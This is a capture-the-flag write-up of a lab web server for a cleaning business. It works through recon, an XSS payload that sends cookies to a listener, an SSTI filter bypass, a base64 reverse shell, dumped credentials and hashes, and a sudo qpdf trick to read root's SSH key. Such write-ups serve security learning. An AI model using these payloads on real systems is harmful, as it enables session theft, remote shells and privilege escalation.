Basic information

Port scan

Only 22 and 80 are open:

```
$ nmap -sC -sV 10.10.11.12
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-07 13:55 CST
Nmap scan report for 10.10.11.12
Host is up (0.34s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 2c:f9:07:77:e3:f1:3a:36:db:f2:3b:94:e3:b7:cf:b2 (ECDSA)
|_  256 4a:91:9f:f2:74:c0:41:81:52:4d:f1:ff:2d:01:78:6b (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.62 seconds
```

80

A hosts entry is needed; the site is a cleaning-services business:

```
10.10.11.12 capiclean.htb
```

Directory scan

A directory scan shows that /dashboard redirects to the home page:

```
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://capiclean.htb/

/about (Status: 200) [Size: 5267]
/dashboard (Status: 302) [Size: 189] [--> /]
/login (Status: 200) [Size: 2106]
/logout (Status: 302) [Size: 189] [--> /]
/quote (Status: 200) [Size: 2237]
/server-status (Status: 403) [Size: 278]
/services (Status: 200) [Size: 8592]
/team (Status: 200) [Size: 8109]
```

capiclean

Registration is disabled; the only place that accepts user input is the service booking (quote) form:

xss

Basic XSS in the service field; mind the encoding:

```
<img src=1 onerror=document.location="http://10.10.16.13:7777/"+btoa(document.cookie)>

GET /c2Vzc2lvbj1leUp5YjJ4bElqb2lNakV6TXpKbU1qazNZVFUzWVRWaE56UXpPRGswWVRCbE5HRTRNREZtWXpNaWZRLlpoSGx0US5wa3pnYmFLSlZyeHNyRllaOFNWWjM0UmxWeDA= HTTP/1.1" 404 -

session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhHltQ.pkzgbaKJVrxsrFYZ8SVZ34RlVx0
```
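What the exfiltrated cookie actually holds, as an added example that is not part of the original writeup: a Flask session cookie is signed with the server's SECRET_KEY but not encrypted, so anyone who captures it can read everything stored in the session, which is why the session should carry only a user identifier and the cookie should be marked HttpOnly so script injected via XSS cannot read it. The script assumes only the Python standard library and the cookie value shown above.

```python
import base64
import json
import zlib
from datetime import datetime, timezone

# Session cookie captured in the writeup above (the value after "session=").
CAPTURED_COOKIE = (
    "eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ"
    ".ZhHltQ.pkzgbaKJVrxsrFYZ8SVZ34RlVx0"
)


def _b64decode(segment: str) -> bytes:
    """URL-safe base64 without padding, as itsdangerous writes it."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def inspect_flask_session(cookie: str) -> dict:
    """Split a Flask session cookie into payload.timestamp.signature and
    decode the two parts that are not secret. The signature is NOT verified:
    the point is that, without the server's SECRET_KEY, the holder of the
    cookie can still read every field stored in the session."""
    if cookie.startswith("session="):
        cookie = cookie.split("=", 1)[1]
    # rsplit keeps a leading '.' on the payload, which marks zlib compression.
    payload, timestamp, signature = cookie.rsplit(".", 2)
    compressed = payload.startswith(".")
    raw = _b64decode(payload.lstrip("."))
    if compressed:
        raw = zlib.decompress(raw)
    # itsdangerous stores the issue time as a big-endian integer.
    issued = int.from_bytes(_b64decode(timestamp), "big")
    return {
        "data": json.loads(raw),
        "issued_at": datetime.fromtimestamp(issued, tz=timezone.utc),
        "signature_bytes": len(_b64decode(signature)),  # 20 = HMAC-SHA1
        "compressed": compressed,
    }


if __name__ == "__main__":
    info = inspect_flask_session(CAPTURED_COOKIE)
    print("session data:", info["data"])
    print("issued at   :", info["issued_at"].isoformat())
    print("HMAC bytes  :", info["signature_bytes"])
```

The decoded payload shows a single `role` field, so whatever the server trusts for authorization is carried client-side in readable form; the signature only stops edits, not disclosure.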

dashboard

After adding the cookie and visiting the dashboard, some admin functions become visible:

Admin dashboard

InvoiceGenerator

Test the admin functions normally: the first one generates an invoice, and filling in arbitrary details returns an Invoice ID:

QRGenerator

Then use this Invoice ID in the second function to generate a QR code; this returns the corresponding QR code image, and a new function appears that takes a link and generates a Scannable Invoice:

Testing it normally with the QR code link just obtained yields an invoice with the QR code embedded:

SSTI

Modifying the link shows that the response echoes our input directly:

Given the response header Server: Werkzeug/2.3.7 Python/3.10.12, a basic SSTI test:

shell

Then use the SSTI to execute commands and get a shell; a simple bypass is needed:

```
{{request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("id")["read"]()}}

bash -i >& /dev/tcp/10.10.16.13/4444 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xMy80NDQ0IDA+JjE=
YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNi4xMy80NDQ0IDA%2BJjE%3D

{{request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNi4xMy80NDQ0IDA%2BJjE%3D | base64 -d | bash")["read"]()}}
```

Information gathering

Reviewing the source, app.py contains the database credentials:

```python
db_config = {
    'host': '127.0.0.1',
    'user': 'iclean',
    'password': 'pxCsmnGLckUb',
    'database': 'capiclean'
}
```

Connect to the database; the users table holds the password hashes:

```
mysql -h 127.0.0.1 -u iclean -ppxCsmnGLckUb

mysql> use capiclean;
mysql> show tables;
mysql> desc users;
mysql> select * from users;

admin 2ae316f10d49222f369139ce899e414e57ed9e339bb75457446f2ba8628a6e51
consuela 0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa
```

consuela

consuela is also a system user, and the hash can be cracked to recover the password:

```
0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa

simple and clean
```

user flag

Log in as consuela with the recovered password:

Privilege escalation information

consuela can run qpdf via sudo:

Trying to read a file directly as the infile fails with a missing PDF header error, but an empty input file is supported, and according to the documentation attachments can be added:

There is also the qdf option, which creates a PDF suitable for viewing in a text editor.

Privilege escalation & root flag

So combine these options: add the file as an attachment to the PDF, then read the PDF to recover the file's contents:

```bash
sudo /usr/bin/qpdf --empty /tmp/miao/miao.pdf --qdf --add-attachment /root/.ssh/id_rsa --

cat miao.pdf
```

root flag

Then log in with the obtained private key:

shadow

```
root:$y$j9T$s0AIwd7onN6K77K5v8DNN/$bSd333U5BKvkfCPEGdf9dLl3bOYwqOlFNtGZ1FQQuv/:19774:0:99999:7:::
consuela:$y$j9T$kcli/RCzquedZVyk0783m/$8KhTzkFppH2THx1k0SuUcjSP4jFXNl6HokF4MKwFr60:19605:0:99999:7:::
```

References